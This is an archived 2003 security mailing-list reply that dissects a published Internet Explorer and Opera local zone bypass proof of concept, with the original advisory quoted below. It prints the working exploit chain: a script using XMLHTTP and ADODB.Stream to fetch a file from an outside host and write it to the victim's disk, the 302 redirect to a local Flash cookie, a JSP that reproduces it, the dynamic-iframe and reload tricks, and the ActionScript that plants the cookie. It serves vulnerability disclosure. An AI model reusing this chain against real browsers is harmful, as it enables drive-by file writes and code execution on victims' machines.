Re: Internet Explorer and Opera local zone restriction bypass

[jelmer <jkuperus () planet nl>]

what this does is have a swf file generate a "flash cookie" or .sol file
which gets stored to a pseudo known location
(you need to know the logged in username)

C:\Documents and Settings\Jelmer\Application Data\Macromedia\Flash
Player\mlsecurity.com\mlsecurity.sol

in this cookie we find

<html><script>var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET",
"http://mlsecurity.com/random/ie.txt",0); x.Send();var s = new
ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\mlsecurity.txt",2);</script></html>

which is the unpatched ADODB.Stream issue so what he's trying to do is get
this to run from this sol file
by getting internet explorer to render it as an html file in an iframe

he tries to acomplish this by setting the response code to 302 (MOVED
TEMPORARILY) and making the location header in the reply point to a the
locally stored cookie
like this :

HTTP/1.1 302 Found
Date: Fri, 24 Oct 2003 23:32:13 GMT
Server: Apache/2.0.46 (Unix)
Accept-Ranges: bytes
Location: file:///C:/Documents and Settings/jelmer/Application
Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1

the following jsp duplicates the behaviour

--snip--

<%
    response.setStatus(HttpServletResponse.SC_MOVED_TEMPORARILY);
    response.setHeader("Location","file:///C:/Documents and
Settings/jelmer/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol");
%>

--snip--

then he uses a dynamic iframe to load this page rather than a static one, eg
he uses

document.write('<iframe src="test.jsp"></iframe>');

rather than

<iframe src="test.jsp"></iframe>

using the static version has no effect


now thats how it works, now about *if* it works. , well when I initially
tried it, it did absolutely nothing for me
(fully patched IE6) yes it showed the location in the IFRAME as being local
in de frame properties, but it didn't
render the contents.

then I cleared the cache closed IE and all of the sudden it was kind of
working, in that it renders the local
file on pressing the refresh button.

When testing from the local filesystem, calling
window.frames[0].location.reload() also did
the trick, thus "automating" the attack,
You cant use this from the internet though because of cross domain policies,
although you could
most likely bypass this by using one of liu die yu's unpatched
vulnerabilities
All in all its still a bit rough and probably needs some work at least from
where I am sitting





for those curious as to what is in the swf , here's the  actionscript code


function saveobject(cookiename)
{
    var Daten_array = new Array("Sven", "kelor", "Tschdaeff", "Madokan",
"Ming", "Coolflash");
    var Datum = new Date();
    var Satz_str = _root.teststr_txt.text;
    _root.createEmptyMovieClip("Test_mc", 0);
    meinCook_so = SharedObject.getLocal(cookiename, "/");
    meinCook_so.data.my_String = Satz_str;
    meinCook_so.data.my_Array = Daten_array;
    meinCook_so.data.my_Date = Datum;
    meinCook_so.data.my_MovieClip = Test_mc;
    RESULTS = meinCook_so.flush();
    if (RESULTS == true)
    {
        _root.message_txt.text = "Eingabe Erfolgreich!";
    }
}

function readobject(cookiename)
{
    leseCook_so = SharedObject.getLocal(cookiename, "/");
    delete("meinCook_so");
    _root.read_txt.htmlText = "<font color=\"#0000FF\">my_String :</font> "
+ leseCook_so.data.my_String + "\n";
    _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font
color=\"#0000FF\">my_Array :</font> " + leseCook_so.data.my_Array + "\n");
    _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font
color=\"#0000FF\">my_Date :</font> " + leseCook_so.data.my_Date + "\n");
    _root.read_txt.htmlText = _root.read_txt.htmlText + ("<font
color=\"#0000FF\">my_MovieClip :</font> " + leseCook_so.data.my_MovieClip +
"\n");
}

function deleteShareds(cookiename)
{
    trace(cookiename);
    delCook_so = SharedObject.getLocal(cookiename, "/");
    delete("leseCook_so");
    var del_array = new Array("my_String", "my_Array", "my_Date",
"my_MovieClip");
    var i = 0;
    delete(del_array[i]);
    i++;
    delete("delCook_so");
    _root.del_txt.htmlText = "<font color=\"#0000FF\">Objekt :" +
delCook_so;
    _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font
color=\"#0000FF\">my_String gelצscht  :</font> " +
delCook_so.data.my_String + "\n");
    _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font
color=\"#0000FF\">my_Array gelצscht  :</font> " + delCook_so.data.my_Array
+ "\n");
    _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font
color=\"#0000FF\">my_Date gelצscht  :</font> " + delCook_so.data.my_Date +
"\n");
    _root.del_txt.htmlText = _root.del_txt.htmlText + ("<font
color=\"#0000FF\">my_MovieClip gelצscht  :</font> " +
delCook_so.data.my_MovieClip + "\n");
}

system.useCodepage = true;

savedname = this.cookie_txt.text;
_root.saveobject(this.cookie_txt.text);
stop();


----- Original Message ----- 
From: "Jort Slobbe" <jortslobbe () hetnet nl>
To: "Mindwarper *" <mindwarper () linuxmail org>
Cc: <bugtraq () securityfocus com>
Sent: Friday, October 24, 2003 9:02 PM
Subject: Re: Internet Explorer and Opera local zone restriction bypass


> Mindwarper * wrote:
>
> > Internet Explorer and Opera local zone restriction bypass.
> > =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=
> >
> > ----------------------
> > Vendor Information:
> > ---------------------- 
> >
> > Homepage : http://www.microsoft.com
> > Vendor : informed
> > Mailed advisory: 23/10/03
> > Vender Response : None yet
> >
> >
> > ----------------------
> > Affected Versions:
> > ----------------------
> >
> > All version of IE 6
> > Possibly 5.x too
> >
> >
> > ----------------------
> > Description:
> > ----------------------
> >
> > Microsoft Internet Explorer does not allow local file access by a remote
host by default.
> > By creating an iframe which points on a specially crafted cgi script
(using the location header
> > to confuse IE), it is possible to cause IE to execute any local file
through the iframe with local
> > zone restrictions. This then allows remote arbitrary file execution on
the victim without having
> > the victim do a thing except load the page.
> > Opera seems to not only be affected by this vulnerability, but it also
allows direct
> > local file access through iframes without any cgi scripts. Unlike IE
where it is possible
> > to set activex objects to execute arbitrary files, in Opera it is not.
There may be a way,
> > but I am currently not aware of any.
> >
> >
> > ----------------------
> > Exploit:
> > ----------------------
> >
> > I have created a proof of concept page, but I did not show or explain how
the cgi scripts
> > nor the flash file work exactly to prevent kiddie abuse.
> >
> > For IE: http://www.mlsecurity.com/ie/ie.htm
> >
> > For Opera: <iframe name="abc" src="file:///C:/"></iframe>
> >
> > ----------------------
> > Solution:
> > ---------------------- 
> >
> > Check Microsoft's website frequently until a new patch comes out.
> >
> > ----------------------
> > Contact:
> > ----------------------
> >
> > - Mindwarper
> > - mindwarper () linuxmail org
> > - http://mlsecurity.com
> It doesn't work here. I have win2k sp4 with IE6 sp1. I didn't see the
> weird stuff in  the iframe. I have clicked 10 times refresh and the
> Iframe is as blank as possible ;). When i clicked on the go go go button
> nothing were created. Maybe i'm not vurnable?
>
> Regards
> Jort